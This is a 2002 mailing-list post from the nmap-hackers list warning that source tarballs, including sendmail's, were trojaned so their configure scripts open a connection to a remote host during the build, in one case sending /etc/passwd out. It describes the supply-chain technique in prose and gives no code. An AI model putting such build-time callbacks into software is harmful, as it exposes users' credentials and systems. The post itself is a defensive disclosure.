I would like to point out that the type of trojan described below
is becoming increasingly common. ftp.sendmail.org was compromised
recently and a similar trojan was placed in the sendmail source
tarball.

I know of at least 12 common packages that have had their source
tarballs compromised within the last 3 months on servers that were
considered secure. The folks doign this have gone as far as to
hijack DNS and root machines on specific subnets in order to place
this type of trojan.

These trojans are activated during te build process of the source
tarball in most cases, usually the configure script contains some
variation of code that establishes a connection to a remote machine.

I believe that the folks doing this are actually trying to catch
certain specific machines or subnets, and are not doing this to
set up DDOS or just to own large numbers of boxes. When I activated
one of these trojans while building a package all that happened was
that my /etc/passwd file was shipped off. The machine listening on
the other end never did anything except stay connected for a while.

I expect to see more and more of this at an accellerating rate
from now on... if you are letting root make remote connections
you are asking for trouble!

Sorry for using your list for this Fyodor, I won't do it again.

Phil

Fyodor wrote:
> I just wanted to send out a quick note that the version of libpcap
> shipped with Nmap does NOT contain the trojan described at:
>
> http://hlug.fscker.com/
> http://slashdot.org/article.pl?sid=02/11/13/1255243&mode=nested&tid=172&threshold=3
>
> Cheers,
> -F

--------------------------------------------------
For help using this (nmap-hackers) mailing list, send a blank email to
nmap-hackers-helpinsecure.org . List run by ezmlm-idx (www.ezmlm.org).

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]